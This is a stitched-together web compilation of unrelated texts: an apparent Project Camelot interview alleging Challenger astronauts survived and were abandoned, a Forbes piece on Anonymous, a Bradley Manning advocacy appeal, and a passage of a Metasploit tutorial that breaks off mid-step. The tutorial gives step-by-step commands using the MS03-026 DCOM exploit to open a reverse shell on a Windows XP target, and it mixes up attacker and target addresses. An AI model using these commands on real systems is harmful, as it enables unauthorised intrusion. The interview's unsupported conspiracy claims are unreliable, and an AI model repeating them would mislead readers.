But… then we were ordered off because there was an AGI, and what an AGI is, it was Russian. And it looks like a fishing trawler, but they’re intelligence-gathering ships. And we had to an intercept on the AGI, keep them out of that restricted area. Because there was quite a lot of debris that was thrown free. And you’re talking manuals. Some… There were several manuals. And one of the gloves we picked up, that they use on their suits, when they go outside into the space environment. And we would pick up debris and we also recovered a lot of assemblies, because it’s made out of titanium. And it was amazing, because we actually recovered the right landing gear assembly. And then we would run it into the cape, and they’d offload it, photograph everything. And then we’d go back out. But the USS Aubrey Fitch (FFG‑34) was the first ship and that was the ship I served on, that was first on-scene during the Challenger accident.

Kerry:  Okay. But, there seems to be some confusion as to whether or not, what the astronauts actually died of, and also, from John Lear…

Ed:  [coughs]

Kerry:  …I recall that the Challenger situation was actually, that there is some unknown information out there about it, possibly some intended effects of actions that were taken on the ground, before the thing took off.

Ed:  Well, the thing…

Kerry:  Do you know anything about what, why the astronauts were not rescued?

Ed:  They were written off, as far as we could determine. And it was poor judgment by Mr. Truly. ______

Kerry:  Okay. They were written off by us?

Ed:  Yeah. They gave up on them. They assumed, because of the catastrophic explosion, they were dead. And then we desperately, my commanding officer, gave them all the information. ‘We think there are survivors.’ And then we were ordered off. And then a lot of the guys… ________

Kerry:  So, you were there first on… wait, wait, wait. You were there first on the scene.

Ed:  Correct.

Kerry:  In theory, you could have helped recover the bodies or help get people to safety, but you were ordered off.

Ed:  Yes, ma’am. Yeah, we were. Yeah. That’s the way it was.

Kerry:  So why, as an investigator, have you never, like, gone down this road at all?

Ed:  Well, because… I mean, you can’t really take on an error that NASA made. And that was their big blunder, because they didn’t have a real picture of the situation out there and they weren’t paying attention to a United States Navy ship.

Kerry:  Why would they not do that, though? I mean, in other words, I’m Project Camelot, right? So, I’m looking for conspiracies everywhere I turn. Some would say that’s foolish and others would say that you’d be foolish not to look for that, at this point in this juncture of our history. So, what I’m asking you is, if your ship was there, if you were first on the scene, if you were on the crew, didn’t something strike you as being wrong, and not just because of human error or foolhardy judgments, because you’ve got people in NASA who are… they’re sending astronauts out into space. They have to have good judgment to even get their jobs. So…

Ed:  I understand that, Kerry. But they didn’t have any good judgment. Their judgment flew out the window that morning at 11:35[am], roughly, or whenever. [Plus, the actual…]

Kerry:  Okay. Is it possible they were under orders? They were under orders to tell you to leave the scene?

Ed:  Well, I can only tell you how it was and we had to go chase after an AGI, a Russian trawler, and we were told to pull back. However, I have heard stories, we’ll call them, that they had an in-… an on-board computer. They do have black boxes. And the Challenger had one. And it was reported that they were actually, saw us, [some part of our] ship pulling up, and they were quite excited about rescue. And they heard us, because we did a back-down, and what that is, we threw our propeller… It’s like an umbrella. And you can shift the blades — it’s hydraulic — and you get cavitation… when you’re on forward momentum, and then you reverse the propeller, and it bites backwards. It will… [the thing] turns inside-out. All hydraulic. And you cavitate the ship, and it will vibrate.

On their flight recorders in the Challenger, they heard our cavitation. And all that stuff we sealed up and put away. But I’m getting my certificate out, and I’ll just briefly read this to you. And it… manned flight awareness certificate of appreciation is what it is for NASA, presented to Edward G. Laughrin. ‘The appreciation of your dedication to the critical task you performed in support of presidential commission investigating the Space Shuttle Challenger accident. Your valuable contribution assisted in identifying the actions required to return the national space transportation system to flight status.’ And… there you have it. They…

Kerry:  Okay. But in reality, that’s… that sounds like a ticket to be quiet.

Ed:  A ticket to be quiet? Eh, maybe, I guess. [laughs]

Kerry:  Okay. [chuckles] Uh-huh.

Ed:  I don’t…

Kerry:  No, I mean, Look, I have a commendation from some work I did as a contractor over at JPL. So, I understand how they dole these kind of things out. Look, in terms of what goes on with your being there, you said that there was an ‘AGI.’ Is that how you termed it? A Russian trawler?

Ed:  A Russian trawler. AGI. Correct.

Kerry:  Now, what was the role of the Russian trawler. Were they trying to help? Why were they there?

Ed:  No. Not at all. What they do, they would monitor our activities here at the Cape. They did have real special interest in filming the… anything that NASA would launch, from shuttles to satellites to whatever they do, whatever launch, launches they happen to have. And they were always trailing us. When we go out on deployment, we’d go out as individual ships and then we’d form up into a battle group. And they would follow us around. [laughs]

Kerry:  Okay. So, but at this point, you’re the first ship on the scene, and then there’s a Russian trawler, and you’re told to leave the scene. Does the Russian trawler follow you, or do they stay on the scene?

Ed:  We backed them off. We forced them out of the area. They were warned off. ‘Leave.’

Kerry:  So, you guys left. Who went in, when you left?

Ed:  Well, there was like a lull right there, because they had to gather their resources. And our _____

Kerry:  Why would they do that? I mean, that’s not… it doesn’t sound intelligent, if you’ve got a…

Ed:  They’re not prepared for accidents. They were caught flat-footed on this thing.

Kerry:  Right. But you were there. You were there and able to assist, but you were turned away. Why were you turned away? Did you ever not report that there was something very suspicious about… If I’m in a distressful situation, I see a ship in the vicinity, and that ship turns away and goes away, I’m going to be extremely upset.

Ed:  Well, the deal was, in the Navy, we have to follow orders.

Kerry:  Sure.

Ed:  And it’s a chain of command.

Kerry:  But you are able to question an order that is illegal or…

Ed:  Not really. Well, if you can really prove it’s illegal, you have the Unified Code of Military Justice, but you have to have witnesses. But by and large, you have to follow an order. You don’t ask why _________

Kerry:  Okay. But you were… How many people were on your ship?

Ed:  My frigate… we had roughly about 185. ______

Kerry:  So, 185 people were witnesses, right?

Ed:  Correct. Not of all them. Some of them down in the engine room are the cooks and store keepers.

Kerry:  Okay.

Ed:  They weren’t really privy, but everybody, all hands on deck, when we were recovering wreckage and debris. So everybody basically chipped in and they were aware…

Kerry:  I see.

Ed:  …after the event. _____

Kerry:  I mean, is there some danger that your ship posed to the survivors of the Challenger?

Ed:  No. None at all. No. Negative. No. Not at all.

Kerry:  Okay. So then, I don’t understand, in good conscience, if I’m captain of a ship and I… and the Challenger with these very famous astronauts is in danger, how in good conscience, do I turn my ship around and leave?

Ed:  You follow orders. Now, [that’s] orders.

Kerry:  And never question, never question, never investigate further?

Ed:  No. You don’t. You follow orders. And that’s your primary objective, serving in the armed forces. And I was an enlisted man. So, my thoughts belong to me. But… _________.

Kerry:  Okay. What about among your crewmates? Did you guys ever discuss the idea that possibly the… and the fact that you guys were turned away, that that was the last chance that those people had, to stay alive?

Ed:  Well, we’re human beings, too. And you’re correct. We did discuss it. And it was disturbing to us.

Kerry:  Wow.

Ed:  It was. It bothered a lot of us. I mean, all of us. It bothered us. It was horrific.

Kerry:  That’s incredible.

Ed:  Yes, it was. Well, you see, our Navy, the admiral up there in Mayport, turned us over to NASA, to take our orders from them. But then, our duty was to protect the scene. And there’s the North Atlantic drift, and a lot of material was drifting up from… up towards the Northeast. It started to spread out. And… I mean, it was just… I mean, the sea was just littered with debris. And then the heavier objects sunk down to 90 feet, because that was the depth on our fathometer we were pinging off the sea bed.

Kerry:  Right.

Ed:  And you know, and I don’t know if you, being from California there, you’d probably… Have you ever done scuba diving? If you have, you know you can go to 90 feet. You just have to be careful on your decompression up. ________

Kerry:  So are you saying… Maybe I don’t understand, because I have done scuba diving, but I’m… I don’t know much about it. I only tried it once, I think.

Ed:  Yeah.

Kerry:  But at any rate, not here in California. Are you saying that the Challenger landed in water that was 90 feet deep?

Ed:  Yeah, which is… They landed short of the continental drop-off…

Kerry:  Right.

Ed:  …that runs out [clears throat]. Yeah. Because we, they could not have… Well, they could have recovered them, but they was in relatively shallow water, 90 feet.

Kerry:  Well then… Okay. So… Even here again… So, there had to be some pretty significant evidence that they were able to recover, right?

Ed:  Well, we took our orders. And then they… we did what we did. We followed orders. We were [all]… Well, I’ll be honest with you. It was sort of an assumption that they were gonna, they had a search-and-rescue operation within their capability at NASA. Now, it turns out, Kerry, they do not. They did not. They had nothing going for them. They had to rely on the Navy and the Coast Guard. They had no capability, at all. Their only way was to… like, if something went snafu through the vehicle, to turn around and land. [laughs] And… ________

Kerry:  Well, I guess I’m not understanding… Maybe I just don’t get what you’re talking about. Are you saying NASA or the space shuttle itself had no capability to deal with a crashed… craft?

Ed:  Of that catastrophic event… there’s no way. I mean, they were done. I mean, they had no wings. They were blown apart except for the crew compartment, which you have an upper tier and a lower tier. I mean, that was it, in a nutshell. And they dropped and they hit the water. And they… it was the left side where the hatch apparently was at, and we had them on radar. I mean, we actually painted them, plotted them, had them right on the button. And it was through our CIC. And we were relating all this information. We were in… It’s like it was too much for them. They went into like a vapor lock. The Powers That Be, their managers and the ones… because it was a shock factor. Naturally, it caught them off-guard.

But let’s roll this back a little bit. As to what I understand, being in the United States Navy, what caused the accident? What caused the accident, from what we understood in the Navy afterwards, was that they were had a boom, and you have the external tank. Then you have the forward strut attachment point, where the Challenger attached to the forward… Well, forward strut on the external tank. They had a boom that got away from, some way, somehow. And it punctured that tank. And they did a repair job. I mean, they patched it. Whatever.

And then that morning, it was very, very cold, because we had some relatively warm jackets on, that morning. The ones that were on the rev watch. And I believe the story where the O-rings on the solid fuel rockets. I mean, they were frozen, so they contracted. It wasn’t proper seal. So on the ascension, that patch let loose, and you can see a flame if you watch the video, where it ignited and a flame shot out of the one side of the one rocket booster, igniting in a blue flame. Look for a blue flame. And it travels all the way up, right behind the front attachment point of the Challenger to the external fuel tank. And then a split-second later, you have a catastrophic explosion. And that’s how… [it wiped out].

Kerry:  Okay. Well… I’m actually on the internet, as your speaking, looking up fatal events involving NASA astronauts. And what you said was, they were unprepared, as if they had no idea that such a thing could happen. And we are saying this happened in the year 1986.

Ed:  Correct.

Kerry:  Okay? January 28th.

Ed:  Correct. _____

Kerry:  So, NASA had been operation for what? Twenty, at least twenty years at that point?

Ed:  Well, quite a while, but… _____

Kerry:  [chuckles] You know, I don’t buy it. I’m sorry. I appreciate…

Ed:  They’re all type-A personalities. [laughs]

Kerry:  Yeah. I appreciate that. But I don’t buy it. I have to say that, they have to prepared for anything and everything, under their circumstances of what they do for a living. And I…

Ed:  Well, you might be a little biased, because you worked for the… for those folks.

Kerry:  That’s right.

Ed:  So, I understand where you’re coming from. And I appreciate that. And I respect you. But, however, this event, psychologically, this was a mind-blowing experience.

Kerry:  [laughs]

Ed:  My goodness [the] shockwave… _______

Kerry:  Even so, but if… Let’s put yourself in that situation of a mind-blowing experience, and you’ve got people in NASA who are on, I guess, on the floor or on the board, whatever you call that, watching events. And at the same time, in connection, in communication with your ship, and telling your ship to back away. See, there is something very, very profound going on there. I don’t understand. As far as I’m concerned — and I know we started talking about the Kennedy assassination — but this is just one more…

Ed:  This is really transitioned, hasn’t it, Kerry? It’s a big transition. Yes, it is. Well, I’ll be… I’m being as honest and straight-up with you as I possibly could be. But you might say we critiqued NASA. I mean, we most definitely did. And… I mean, we’re trained for disasters. We look awful cute in our crackerjacks. You’ve seen sailors. I’m sure you have. Aren’t we cute. However, our business is warfare at sea. To destroy. To sink. To smash submarines. That was the mission of my ship. And that’s what we were trained to do. And we see the world differently.

And if it was a Navy operation from the get-go, you probably would have had a different end result, because NASA is actually civilians. Sure, they’re rolled into the federal government. Whatever. But they don’t have mind-set of… of the military. And I can’t really speak for the other branches, because I don’t know that much about them. But I do feel comfortable about addressing what it was like to be a member of the United States Navy. And… I don’t know why they dropped the ball.

Kerry:  Okay.

Ed:  I can only speculate. Really… I mean, it would have been a little different outcome, I think. And I guess what _______

Kerry:  Right. But dropping the ball. I’m sorry to interrupt you here, but dropping the ball and sending a rescue vessel away. And not having that investigated further. I don’t know that it’s ever been investigated. I don’t know if there are books written, investigating suspicious aspects of this event or not. I haven’t really gone down that road. It doesn’t sound as though you have either.

Ed:  Well, we’re compartmentalized. I mean, the Navy, we did our thing. We were… we would have done more, if called upon to do. And we stayed there. We finished the mission. And we finished our mission. And then we were released after several days, to go back up to Mayport and Liberty Hall, Liberty Hall. And while the married the fellas wanted to get home to their wives and their kids. And then we go about our business. What’s the next agenda for us to do? What’s our next deployment? And then we prepare for that and do our work-ups. And we’re a tight group on a Navy ship. It might be steel, aluminum, brass wires, but the soul of a ship is her crew. And… we did what we did, and we followed our orders.

And it’s actually amazing that we got into this subject, because I had no idea I was going to go over this. None whatsoever. I thought we were just going to talk about my ballistics with Jack Kennedy. But anyhow, you’re getting a bonus here. [laughs]

Kerry:  [laughs]

Ed:  [laughs]

Kerry:  Okay. Well, I appreciate that. At this time, what I would suggest is that we wrap this up. It’s been going for a while. I think that I will just put it out with the Kennedy information and that the… the sort of questions that are now raised about the Challenger. I know there will be investigators out there. I am doing a quick search on the net, to see if there are other people who have started to investigate it. And it looks like there are some. And possibly this will sort of pique some interest out there, and you may get some feedback. Do you want to give out an email address or anything like that, so people can reach you, if they have more information about either subject?

Ed:  Well… I don’t know how I’m going to be feeling, after I go through all this business I have to go through medically. And… I can give you my email address at a later date, if that’s okay with you.

Kerry:  No problem. So, if people are interested in this subject, and they want to talk to Ed Laughrin, why don’t you write to me, [email protected], and then I will forward the emails along to Ed. And then he can answer them, if and when he gets a chance.

Ed:  Yeah. The last name’s pronounced… It’s very Scotch-Irish, Kerry. I go all the way back to [Aries] Loch, and that’s 50 A.D. in Scotland.

Kerry:  Okay.

Ed:  I had… I mean, one of my cousins and then an aunt and several other ones, kept track of the family record. And it’s pronounced ‘lock,’ like the lock on your car, lock on your door. And the ‘rin’ is Irish, because we had to evacuate, along Hadrian’s Wall, because we weren’t doing very good against the Romans. And they made a tactical withdrawal to the Isle of Man in Northern Ireland. So, that’s my lineage. And ‘Aries,’ by the way, means Mars. So, what does that mean? [laughs] We can get into a whole new topic, couldn’t we? Very easily, yeah.

Kerry:  Sure. Absolutely. Okay, at this point, I’d like to wish you good luck. If you haven’t already read Richard Hoagland’s book about NASA, I highly recommend it, which is called ‘Dark Mission.’

Ed:  Oh yeah. Yeah, yeah. I’m a little bit familiar through you…

Kerry:  Uh-huh.

Ed:  …you and Project Camelot about it, and I’ve thoroughly found these very educational. And I really enjoy Bob Dean. I’ve never met him, but you… give him my respects from a former fleet sailor. [laughs]

Kerry:  Okay.

Ed:  And… Yeah. He’s pretty remarkable, but he… I’m really amazed that a retired command master sergeant has such a fantastic pigtail. How far down does that actually go down his back? Pretty darn far. But, anyhow…

Kerry:  [chuckles]

Ed:  I appreciate this. And the reason why I never really went public on any of this business about the Challenger, is because respect for the families and also, too, what used to gall us, was that they were blown to bits, on the media and national news. ‘Oh, they were blown to bits.’ And then speculation — ‘They must have been blown to bits.’ Well, they weren’t blown to bits. The fallen astronauts, the seven, were laid to rest in coffins. They were in… they had their toes and their fingers.

Kerry:  Right.

Ed:  The ones on the bottom deck, they suffered shrapnel. But Judy used up all her air, and she was on zero and she had a dry head. And… if you go on the internet, you might be able to get that up. But that was all what we heard through the grapevine in the United States Navy at that time. So, [sighs] again, I want to thank you and thank you for Project Camelot. And give my respects to Bill Ryan, who, by the way, did an interview with — you could him a friend of mine — and that is Paul Hellyer, former Minister of Defense. I know Paul. I helped him a little bit with his book, ‘Light at the End of the Tunnel,’ and I set up the interview that he did with Travis Walton. And I also know Travis.

And I’ve had the same type of experience but not so profound, back in March of ’75 with a crescent-shaped vehicle. And we have quite a bit in common, and there were… if there’s ever points where he gets down a little bit, I try to cheer him up about it, such as, ‘Well, Travis, they didn’t eat us.’ [laughs] So, I know Travis and Paul.

Kerry:  Okay.

Ed:  Yeah. So, yeah.

Kerry:  All right. Well, listen, Ed. Thank you very much for your testimony at this point. And possibly we can continue this when you return and you feel better.

Ed:  Okay.

Kerry:  And I would appreciate it, if you possibly would consider looking further into the Challenger information, if it interests you at all, simply because, if you were a ship on the scene, and you were turned away, and these astronauts could have been rescued, and some could have survived, then we have a whole different ballgame happening. And it’s just more of this sort of kind of conspiracy that has been plaguing NASA since the beginning, and that there are other very, very strong elements, even happening now. And you can… I’ll give you free access to my — if I haven’t already — to my ‘Awake and Aware Conference.’

Ed:  Okay. Thank you.

Kerry:  So you can listen. And I advise you to listen to Richard Hoagland’s presentation on Elenin and other matters, because you can see, in following his train of investigation, that there is a lot of evasion going on by NASA on a constant basis, and obviously, it didn’t start yesterday. It started many, many years ago. And this involves the secret space program, etc., etc. So, the rabbit hole goes very deep.

Ed:  Yes, it does.

Kerry:  And I appreciate the level that which you’re trying to investigate, but I think that you could go a lot farther.

Ed:  Well, thank you for that. And also, too, you did an interview with Andrew Basiago. [pronounces it BA-sa-go]

Kerry:  Basiago. [pronounces it ba-SAJ-yo]

Ed:  Basiago. ___________

Kerry:  Basiago. Yeah, we have not interviewed him. We did interview him in a TV show that is handled by truTV, and we are waiting for the release of that TV show. It is sitting on the shelf right now. They’ve gone outside of their contract and have not shown it yet. And we are still waiting for an air date.

Ed:  Well, I don’t get along with him. I’ve had conversations with him, and I have problems with the ethics, human rights violations. I… we talked about timelines — and I’ll be straight with you, Kerry — he accused of me of… a possible individual to interfere with the timeline. Now, that’s… We got into a little argument over the phone. And he vented on me pretty good. But personally, I don’t hold anything against him, but we don’t see eye-to-eye on Pegasus. And certain…

Kerry:  That’s all good. I’m sure that we could cover that at another date. I mean, it’s very important for people to compare notes and to cross-correlate information. So, if you have a different information, we’re happy to listen to it.

Ed:  Okay. yeah.

Kerry:  Whatever.

Ed:  But I believe in our autonomy as human beings. I believe that we shouldn’t be modified and we should not be enslaved. Absolutely not.

Kerry:  Right.

Ed:  And that’s my point of view. I’m very pro-human and pro-planet. And that’s just the way I’m put together. And Andy seemed to be a little obtuse. A little impersonal. And me, I take it very seriously, especially the business out there. It… what do you call it, Dulce, human experiments, bio-genetic stuff is outrageous.

Kerry:  Right.

Ed:  Yeah. It’s absolutely an abomination, in my opinion. And I’m very pro-human. And I’m going to be that way for the rest of my life. And we are royalty — I’m convinced of that — in the universe. We are very unique, our species. We’re special. [laughs]

Kerry:  I hear you, and I agree with you, Ed. Okay. Well, thank you very much. Like I said, I’m going to wrap this up, and I hope the recording came out, so it’s audible and understandable. Let’s reconvene at some point in the near future. I’ll be in India for about a little over two weeks. And I’m sure you’ll be recovering. Good luck with your surgery. If… I highly recommend natural healers rather than going through the medical establishment, if you could avoid it, but I assume you’re following your own… inner dictate[s].

Ed:  Yeah. I did have a very sore chest. So, I’m going to have to have a very good pillow if I cough.

Kerry:  Okay.

Ed:  [laughs]

Kerry:  All right. Well, you hang in there, all right?

Ed:  I’ll do that, Kerry, and you have a very safe trip.

Kerry:  Thank you very much

 

SOURCE: http://www.projectcamelot.org/

Is Anonymous The Internet’s Most Powerful Mirage?

Is Anonymous The Internet’s Most Powerful Mirage?

You may have noticed it last week. Anonymous claimed the scalp of yet another a major government agency.

Supporters of the the online movement of activists and internet trolls said they’d stolen 1.7 GB of data from an agency within the Department of Justice that aggregates crime data. They claimed to have nabbed “lots of shiny things such as internal emails and the entire database dump.” They branded the heist as “Monday Mail Mayhem,” said it could help people “know the corruption in their government.” They posted it on Pirate Bay as a torrent, for anyone to see — and 1.7 GB was just the size of the zipped file.

Not many people bothered to check what was actually in the huge file.

Step in Identity Finder, a software security firm.  Privacy officer Aaron Titus downloaded the payload last week and sifted through it all, checking out the veracity of the claims by Anonymous.

Turned out they were overhyped.

The zipped file contained 6.5 GB of web server files and “does not appear to contain any sensitive personal information, internal documents, or internal emails,” according to Titus. A folder named “Mail” was mostly empty, though it contained two administrative email addresses. There were also no personal details (social security numbers or credit card numbers), and the worst the breach had done was reveal the site’s web server file, which could be leveraged by other hackers for future attacks.

It looked like the breach had done more to grab attention from the media and the Department of Justice than do any real damage.

Surprised? You shouldn’t be. This was another illustration of the power of Anonymous as a continuing online insurgency: not in hacking per se, but its constant ability to grab eyeballs, project power, and give followers a voice and sense of purpose unlike any they’ve experienced before. What’s important for companies and policy makers (the typical targets) to note is that it’s oftentimes more a tease than anything else.

Other examples:

1) Earlier this month Fox News reported that an online group called TheWikiBoat, aligned with Anonymous, planned to bring down the websites of 46 major companies on Friday May 25. TheWikiBoat said in a public statement that it had “no motives other then [sic] doing it for the lulz,” (ie. for shits and giggles). The FBI’s Cyber Division was concerned enough to send an email to the likes of Apple Computer, McDonald’s and ExxonMobile warning them of a potential attack — which didn’t happen.

2) Around this time last year, a single supporter of Anonymous managed to grab global headlines when he tweeted that he had a cache of bank of America emails. What he eventually released was an e-mail exchange between himself and a BofA ex-staffer who made (what admittedly looked like valid) complaints about the bank’s management. But it did nothing to the bank’s stock price, and the news agenda quickly moved on.

3) In December 2010 Anonymous claimed responsibility for taking down the websites of PayPal, MasterCard and Visa after these firms nixed online donations to WikiLeaks. How? Supporters implied it was thanks to thousands of volunteers who had become part of an cyber army by downloading a software tool called LOIC. What really happened: a couple of supporters with botnets temporarily took the sites down — but the notion that Anonymous was an international “army” of hacktivists was left floating around the Internet.

Time and again, online supporters have laid claim to the brand power of Anonymous, invoking its name, imagery such as the Guy Fawkes logo and headless, suited man surrounded by olive leaves, along with the tag line, “We are Anonymous… Expect us.” The result: news outlets and policy makers sit up and listen, more so than they would if those supporters used their real names, or were literally anonymous. The power of Anonymous is propagated by the continued use of a name wrapped in hype and disinformation, more than the occasional real hacks.

The Anonymous “brand” gets street cred from cyber attacks carried out by a minority of hackers who know how to use SQL injection techniques or who know people who control botnets. The additional hype comes from the impassioned, sometimes-threatening rhetoric of less-skilled-but-enthusiastic followers on Twitter or the imageboard 4chan.

Why do these supporters join in? Everyone has their own reasons — something to do, the engaging community of people to talk to, the thrill of being part of a secret crowd. Sources in Anonymous that I have spoken to over the last year often speak to a sense of purpose they get from Anonymous, and sometimes the justification to do the subversive, often-illegal things online that they would not otherwise do. It’s mob mentality with a twist — the activist element of protest, twinned with the culture of trolling and exaggeration that runs through image boards like 4chan.

For law enforcement, who happen to chase anarchists with particular zeal in the United States, there isn’t so much a criminal organization to rope in as the mirage of one. No system with leaders and rules, but a culture and etiquette that is changing all the time. Many of the figureheads who organized the Anonymous attacks against Scientology in 2008 have left the community to focus on college or full-time jobs, many happy to break away from the frenetic pace of operations and the constant paranoia about getting doxxed. Those who’ve been arrested are upheld as martyrs within the network, and there are many more who are joining, and who think they can do a better job of hiding from the police.

Anonymous will continue to exist for some time, taking new followers, changing tactics, and often staying one spontaneously-placed step ahead of the police. They’ll fight for the right to their anonymity, to expose other people’s information, or anything they want, and they’ll come and go from the headlines. But these chaotic actors will stick around, and their greatest power will continue to be not their skills or abilities, but the very name that they can invoke.

For more details on how Anonymous works and the real, human stories behind it, check out my forthcoming book, “We Are Anonymous: Inside the Hacker World Of LulzSec, Anonymous and the Global Cyber Insurgency.”

Or follow me on Twitter: @parmy

SOURCE: http://www.forbes.com/sites/parmyolson/2012/05/30/is-anonymous-the-internets-most-powerful-mirage/

Help A True Hero: The Bradley Manning Support Network

Help A True Hero: The Bradley Manning Support Network

To support Bradley Manning visit www.bradleymanning.org

Nobel Peace Prize nominee PFC Bradley Manning, a 24-year-old Army intelligence analyst, is accused of releasing the Collateral Murder video, that shows the killing of unarmed civilians and two Reuters journalists, by a US Apache helicopter crew in Iraq. He is also accused of sharing the Afghan War Diary, the Iraq War Logs, and series of embarrassing US diplomatic cables. These documents were published by the anti-secrecy website WikiLeaks, and they have illuminated such issues as the true number and cause of civilian casualties in Iraq, along with a number of human rights abuses by U.S.-funded contractors and foreign militaries, and the role that spying and bribes play in international diplomacy. Given the war crimes exposed, if PFC Bradley Manning was the source for these documents, he should be given a medal of honor.

Not a single person has been harmed by the release of this information.  Defense Secretary Robert M. Gates has called the effect of WikiLeaks’ releases on U.S. foreign relations “fairly modest.” Yet the Obama administration has chosen to persecute the whistle-blower rather than prosecute the war criminals who were exposed. While the prosecution has declared it does not intend to seek the death penalty, they do seek to lock PFC Bradley Manning away for life, with the most ridiculous charge of ‘aiding the enemy,’ even though chat logs attributed to Bradley by the FBI clearly show intent only to inform the public and promote “discussion, debates, and reforms.”

Soldiers are promised fair treatment and a speedy trial under the Uniform Code of Military Justice (UCMJ). However, the soldiers responsible for PFC Manning’s care took it upon themselves to abuse him by keeping him locked up in solitary confinement for the first 10 months of his incarceration. During this time, Bradley was denied meaningful exercise, social interaction, sunlight, and on a number of occasions he was forced to stay completely naked. These conditions were unique to Bradley and are illegal even under US military law, as they amount to extreme pre-trial punishment. In March 2011, chief US State Department spokesperson PJ Crowley called PFC Manning’s treatment at the Quantico, Virginia, Marine Corps brig “ridiculous and counterproductive and stupid.” He was forced to resign shortly after admitting this. Since resigning, he has stated that the prosecution’s heavy-handed persecution of PFC Manning has undermined the government’s credibility.

Bradley’s treatment sparked a probe by the United Nations special rapporteur on torture, Juan Mendez. Mr. Mendez stated that he has been “frustrated by the prevarication of the US government with regard to my attempts to visit Mr. Manning.” After having his requests to visit Bradley repeatedly blocked, and after completing a fourteen month investigation, Mr. Mendez issued a statement saying that PFC Bradley Manning’s treatment has been “cruel and inhuman.”

It only took one week in April 2011 to have over a half million people sign a petition calling on President Obama to end the isolation and torture of Bradley Manning. The Obama administration’s ongoing persecution of Bradley Manning has served as “a chilling deterrent to other potential whistleblowers committed to public integrity,” and over 300 top legal scholars have declared that Bradley’s treatment was a violation of the Eighth Amendment’s prohibition against cruel and unusual punishment,  as well as a violation of the Fifth Amendment’s guarantee against punishment without trial.  Among the signatories is professor Laurence Tribe, a Harvard professor who taught President Obama. Professor Tribe was, until recently, a senior advisor to the US Justice Department.

Partially in response to public outcry, on April 21, 2011, Bradley was moved from Quantico to Fort Leavenworth, KS, where his conditions greatly improved.  The very day he was moved, President Obama was surprised at a breakfast fundraiser by a group of protesters.  At the end of the fundraiser, a member of the Bradley Manning Support Network, Logan Price, questioned him about Bradley’s situation.  The President stated that “He [Bradley Manning] broke the law.” This pretrial declaration of guilt that has caused concern among legal experts, who argue it is clearly a case of ‘undue command influence’. President Obama is the highest ranking military commander, and soldiers follow his orders and his direction. By declaring PFC Bradley Manning guilty, he set the tone and direction of the subordinate military prosecution. It is now difficult for soldiers to express support for PFC Bradley Manning, who like many soldiers who follow the lead of their commander-in-chief, assume PFC Bradley Manning is guilty. Finally, reinforcing the assumption of Manning’s guilt, no charges were filed against any of the soldiers who took it upon themselves to abuse Bradley while he was under their supervision.

Bradley Manning has a growing list of supporters who want all the charges against him dropped. Among the supporters is the famous whistle-blower, Daniel Ellsberg, who leaked the Pentagon Papers in 1971. Recognizing the valor required to tell the truth, Ellsberg calls PFC Bradley Manning a hero and a patriot. We agree. Drop all the charges, and free PFC Bradley Manning.

We hope that you will join us as well. See what you can do to support justice in this historic time.

Here are some recommended articles with more information:

Read the Wikipedia article on Bradley Manning.
* Download Bradley’s full charge sheet: charge sheet

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP

In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.

Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

  • Exploit

Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.

  • Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

  • Shellcode

This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.

  • Module

A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.

  • Listener

This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.

  • Show

Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.

Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1 Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

 

Open the the Metasploit console.

msfconsole

Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2 Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom

 

Step 3 Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.

msf > use exploit/windows/dcerpc/ms03_026_dcom

 

Note that the prompt has changed and now reflects our chosen exploit.

Step 4 Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.

msf > show options

 

Step 5 Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.

msf > set RHOST 10.0.0.3

Step 6 Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads

 

Step 7 Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD  generic/shell_reverse_tcp

 

Step 8 Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.

